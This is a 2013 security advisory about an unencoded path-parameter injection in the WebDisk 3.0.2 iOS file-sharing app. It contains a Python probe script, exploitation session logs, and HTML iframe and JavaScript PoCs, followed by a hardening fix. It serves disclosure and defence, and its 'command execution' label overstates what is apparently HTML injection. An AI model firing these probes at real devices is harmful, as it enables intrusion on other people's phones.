List: bugtraq
Subject: WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-07-28 20:59:39
Message-ID: 51F5863B.3090606 () vulnerability-lab ! com
Title:
======
WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability
Date:
=====
2013-07-27
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1035
VL-ID:
=====
1035
Common Vulnerability Scoring System:
====================================
8.8
Introduction:
=============
WebDisk lets your iPhone/iPad become a file website over a Wi-Fi network. You can
upload/download your documents to your iPhone/iPad in your PC browser over Wi-Fi, and
it is also a document viewer. It lets you view your documents directly on your
iPhone/iPad.
( Copy of the Homepage: https://itunes.apple.com/us/app/webdisk/id546221210 )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered a remote code execution
vulnerability in the WebDisk v3.0.2 application (Apple iOS - iPad & iPhone).
Report-Timeline:
================
2013-07-27: Public Disclosure (Vulnerability Laboratory)
Status:
========
Published
Affected Products:
==================
Apple AppStore
Product: WebDisk PhotoViewer - Application 3.0.2
Exploitation-Technique:
=======================
Remote
Severity:
=========
Critical
Details:
========
A remote command execution web vulnerability has been identified in the WebDisk v3.0.2
application (Apple iOS - iPad & iPhone). The application embeds a web server (reported
as MHttpServer/1.0.0 in the session logs below, listening on TCP port 1861) so that
files can be managed from a browser over Wi-Fi. The vulnerability allows a remote
attacker who can reach that port to execute code inside the vulnerable web
application module and thereby compromise the device.
The vulnerability is located in the afgetdir.ma file (the directory listing handler)
when it processes manipulated values of the p (path) parameter. The upload input field
on the main index page is the entry point, but no file has to be selected: the attacker
issues the same request directly as a GET with the payload appended to the path in p.
The injected string is then rendered, without any encoding, in the directory listing
that the index module displays under the upload input field, which is how the session
logs and the listing source in the Proof of Concept section demonstrate the issue. The
result is code execution in the context of the main index module of the WebDisk Wi-Fi
application.
Exploitation of the vulnerability requires neither user interaction nor a privileged
application user account; it only requires network access to the application's port,
typically from the same Wi-Fi network. Successful exploitation results in compromise
of the WebDisk web application or of the Apple device via remote code execution.
Vulnerable Module(s):
[+] Upload - Input Field
Vulnerable File(s):
[+] afgetdir.ma
Vulnerable Parameter(s):
[+] p (path)
Affected Module(s):
[+] Index File Dir Listing
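The request pattern from the Details section, as an added example that is not code from the advisory or from the WebDisk vendor: it rebuilds the GET against afgetthum.ma with the p parameter as shown in the session logs, then checks a directory listing for the injected marker being rendered unencoded. The endpoint names, the p parameter, the MHttpServer listing markup and the document root are taken from this advisory; the two sample listings inside the block are constructed so the checks run offline, and the live probe function assumes a device reachable on port 1861.

```python
"""Probe for the WebDisk 3.0.2 p-parameter injection described above.

Added example; not code from the advisory or from the WebDisk vendor. It
assumes the endpoint names (afgetthum.ma, afgetdir.ma), the p parameter and
the MHttpServer listing markup exactly as the session logs and the Review
Source excerpt of this advisory show them. The sample listings at the bottom
are constructed so the checks run offline.
"""
import html
import re
import urllib.parse
import urllib.request

# Document root copied from the advisory's request log. The application-container
# UUID differs per device; the listing's own links (Referer, delete) reveal it.
DOC_ROOT = ("\\var\\mobile\\Applications\\8D137E49-3793-4C45-9A50-B8AF3AE7EA56"
            "\\Documents\\Library\\WD\\")

# The marker string the advisory injected; it contains HTML-significant characters
# (> and ") so encoded and unencoded rendering are easy to tell apart.
MARKER = '>"[CODE EXECUTION VULNERABILITY!]'


def build_probe_url(host, port, endpoint, doc_root, marker):
    """Rebuild the GET from the session logs: /<endpoint>?p=<doc_root><marker>,
    with every backslash percent-encoded as %5C (quote() with safe="")."""
    p = urllib.parse.quote(doc_root + marker, safe="")
    return f"http://{host}:{port}/{endpoint}?p={p}"


def listing_reflects_marker(listing_html, marker):
    """True if the marker appears verbatim inside a listing name cell
    (<td class="tdmid">), i.e. the server emitted it without HTML encoding.
    An HTML-escaped copy (&gt;&quot;...) does not count as reflected."""
    cells = re.findall(r'<td class="tdmid">(.*?)</td>', listing_html, re.S)
    return any(marker in cell for cell in cells)


def probe_live(host, port, timeout=5):
    """Run against a device on the same Wi-Fi network: send the injected request
    to afgetthum.ma, then fetch the directory listing and report whether the
    marker came back unencoded. Needs network access; the offline checks below
    do not call it."""
    urllib.request.urlopen(
        build_probe_url(host, port, "afgetthum.ma", DOC_ROOT, MARKER), timeout=timeout)
    listing_url = build_probe_url(host, port, "afgetdir.ma", DOC_ROOT, "")
    with urllib.request.urlopen(listing_url, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", "replace")
    return listing_reflects_marker(body, MARKER)


# Constructed sample responses modelled on the advisory's Review Source excerpt:
# one that reflects the marker raw (vulnerable) and one that HTML-escapes it.
VULNERABLE_LISTING = (
    '<tr><td class="tdleft"><img class="imgthum" src="afico/files_txt.png"></td>'
    '<td class="tdmid">' + MARKER + '</td>'
    '<td class="tdright">7-26 19:51</td></tr>'
)
SAFE_LISTING = VULNERABLE_LISTING.replace(MARKER, html.escape(MARKER, quote=True))


if __name__ == "__main__":
    print(build_probe_url("192.168.2.104", 1861, "afgetthum.ma", DOC_ROOT, MARKER))
    print("vulnerable sample reflects marker:", listing_reflects_marker(VULNERABLE_LISTING, MARKER))
    print("escaped sample reflects marker:  ", listing_reflects_marker(SAFE_LISTING, MARKER))
```

Run it without arguments to see the probe URL and the two offline checks; call probe_live(host, port) against a test device to perform the injection and read the listing back. A listing that returns only the escaped form (&gt;&quot;...) means the output is encoded and the advisory's condition is not present.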
Proof of Concept:
=================
The remote command execution vulnerability can be exploited by remote attackers
without a privileged application user account or user interaction. For demonstration
or to reproduce ...
--- Exploitation Request Session Logs ---
Status: 200[OK]
GET http://192.168.2.104:1861/aadd.htm
Load Flags[LOAD_BACKGROUND ] Content Size[641] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:1861]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C]
Connection[keep-alive]
Response Headers:
Content-Length[641]
Server[MHttpServer/1.0.0]
Status: 200[OK]
GET http://192.168.2.104:1861/[CODE EXECUTION]+PATH
Load Flags[LOAD_DOCUMENT_URI ]
Content Size[0]
Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:1861]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C]
Connection[keep-alive]
Response Headers:
Content-Length[0]
Server[MHttpServer/1.0.0]
URL=http://192.168.2.104:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C[CODE EXECUTION]
Status: 200[OK]
GET http://192.168.2.104:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CW%5C[CODE EXECUTION]
Load Flags[LOAD_NORMAL] Content Size[20217] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:1861]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C]
Connection[keep-alive]
Response Headers:
Content-Length[20217]
Server[MHttpServer/1.0.0]
--- Exploitation Request Session Logs ---
Reference(s): mHTTP Web-Server
http://localhost:1861/
http://localhost:1861/mjs.js
http://localhost:1861/aadd.htm
http://localhost:1861/afgetthum.ma
PoC Example:
[HOST]:[PORT]/[FILE].[MA]?[PARAM Q]=%5C[PATH VAR]/[DIRECTION]%5C[ID]%5C[DOCUMENTS PATH]%5C[LIBRARY FOLDER]%5C[LOCAL PATH WDisk]%5C[COMMAND EXECUTION]
PoC Link:
http://localhost:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C[COMMAND EXECUTION]
PoC: Exploit 1 - HTML
<html>
<head><title>WebDisk v3.0.2 - Command Execution Vulnerability - Remote PoC</title></head>
<body>
<!-- the iframe loads the injected afgetthum.ma request on the victim's WebDisk host -->
<iframe src="http://localhost:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C[COMMAND EXECUTION]" width="800" height="800"></iframe>
</body>
</html>
PoC: Exploit 2 - JS
<script>
// Same page as Exploit 1, URL-encoded and written with one document.write;
// the %255C sequences decode to the %5C path separators the server expects.
m='%3Chtml%3E%0A%3Chead%3E%3Ctitle%3EWebDisk%20v3.0.2%20-%20Command%20Execution%20Vulnerability%20-%20Remote%20PoC%3C/title%3E%3C/head%3E%0A%3Cbody%3E%0A%3Ciframe%20src%3D%22http%3A//localhost%3A1861/afgetthum.ma%3Fp%3D%255Cvar%255Cmobile%255CApplications%255C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%255CDocuments%255CLibrary%255CWD%255C%5BCOMMAND%20EXECUTION%5D%22%20width%3D%22800%22%20height%3D%22800%22%3E%3C/iframe%3E%0A%3C/body%3E%0A%3C/html%3E';
d=decodeURIComponent(m);document.write(d);
</script>
Review Source: tdmid
<td colspan="3" height="1"><hr class="spline"></td>
</tr>
<tr>
<td class="tdleft"><a href=""><img class="imgthum" src="afico/files_txt.png"></a></td>
<td class="tdmid">>"[CODE EXECUTION VULNERABILITY!]</td>
<td class="tdright">7-26 19:51<br/><br/><a href="afdelete.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C%7C-%7C430429876.txt">delete</a></td>
</tr>
<tr>
<td colspan="3" height="1"><hr class="spline" /></td>
</tr>
Solution:
=========
To fix the command execution, validate the p variable server-side on direct GET
requests (normalise the path and reject any value that does not resolve inside the
application's WD document folder) and encode it before use. In addition, HTML-encode
the file names and every other request-derived string when the directory listing of
the main index module is rendered, so that injected content is displayed as text
rather than interpreted by the browser.
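One way to implement the fix described above, as an added example in Python that is not the vendor's code (WebDisk's embedded server is native iOS code, so this mirrors only the logic): the p value is normalised and rejected unless it resolves under the WD document folder, and file names are HTML-escaped when a listing row is built. The root path and the markup are taken from this advisory's logs; the unsafe renderer reproduces the pattern the listing source shows, for contrast; the listing data at the bottom is constructed.

```python
"""Server-side hardening matching the Solution section: confine p to the WD
document folder and HTML-encode names when rendering the listing.

Added example; not the vendor's code. The root path comes from the advisory's
log, the markup mirrors the Review Source excerpt, and the unsafe renderer
reproduces the behaviour the advisory reports, for contrast.
"""
import html
import posixpath
import urllib.parse

# iOS is a POSIX system; the app accepts backslash-separated paths (%5C in the
# logs), so they are normalised to '/' before any check.
WD_ROOT = "/var/mobile/Applications/8D137E49-3793-4C45-9A50-B8AF3AE7EA56/Documents/Library/WD"


def resolve_under_root(root, requested):
    """Return the absolute path for the p value if, after normalisation, it lies
    inside root; otherwise None. Handles absolute input (as the app sends it),
    relative input, '..' segments and sibling-prefix names such as 'WDX'."""
    candidate = requested.replace("\\", "/")
    if not candidate.startswith("/"):
        candidate = posixpath.join(root, candidate)
    resolved = posixpath.normpath(candidate)
    if resolved == root or resolved.startswith(root + "/"):
        return resolved
    return None


def render_listing_row_unsafe(name, mtime):
    """The pattern the advisory's listing source shows: the name goes into the
    cell verbatim, so '>' and '"' in it become markup."""
    return f'<tr><td class="tdmid">{name}</td><td class="tdright">{mtime}</td></tr>'


def render_listing_row(name, mtime):
    """Hardened row: the name is HTML-escaped in the visible cell and
    percent-encoded in the delete link's query string."""
    safe_name = html.escape(name, quote=True)
    delete_href = "afdelete.ma?p=" + urllib.parse.quote(name, safe="")
    return (
        f'<tr><td class="tdmid">{safe_name}</td>'
        f'<td class="tdright">{html.escape(mtime)}<br/><br/>'
        f'<a href="{delete_href}">delete</a></td></tr>'
    )


def handle_afgetdir(p, entries):
    """Minimal afgetdir.ma stand-in: refuse p unless it stays under WD_ROOT, then
    render the (name, mtime) entries of the resolved directory safely.
    Returns (status, body) so the outcome can be checked without a server."""
    directory = resolve_under_root(WD_ROOT, p)
    if directory is None:
        return 403, "forbidden: path outside the WebDisk document folder"
    rows = "".join(render_listing_row(n, m) for n, m in entries.get(directory, []))
    return 200, f"<table>{rows}</table>"


if __name__ == "__main__":
    # Constructed sample listing data for the root directory.
    sample = {WD_ROOT: [('>"[CODE EXECUTION VULNERABILITY!]', "7-26 19:51")]}
    print(handle_afgetdir("\\var\\mobile\\Applications\\8D137E49-3793-4C45-9A50-B8AF3AE7EA56"
                          "\\Documents\\Library\\WD\\", sample))
    print(handle_afgetdir("..\\..\\..\\Library", sample))
```

The containment check compares against root plus a trailing slash rather than a bare prefix, so a sibling folder whose name merely starts with "WD" is not accepted; the renderer encodes the same name twice in two different contexts (HTML text and a URL query), which is the point the Solution section's "encode the input" and "encode the output listing" make separately.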
Risk:
=====
The security risk of the remote command execution web application vulnerability is
estimated as critical.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty.
Vulnerability Lab disclaims all warranties, either expressed or implied, including
the warranties of merchantability and capability for a particular purpose.
Vulnerability-Lab or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits or special
damages, even if Vulnerability-Lab or its suppliers have been advised of the
possibility of such damages. Some states do not allow the exclusion or limitation of
liability for consequential or incidental damages so the foregoing limitation may
not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partial usage, of this file requires
authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights,
including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website are trademarks of the vulnerability-lab team and the
specific authors or managers. To record, list (feed), modify, use or edit our
material, contact admin@vulnerability-lab.com or research@vulnerability-lab.com to
get permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com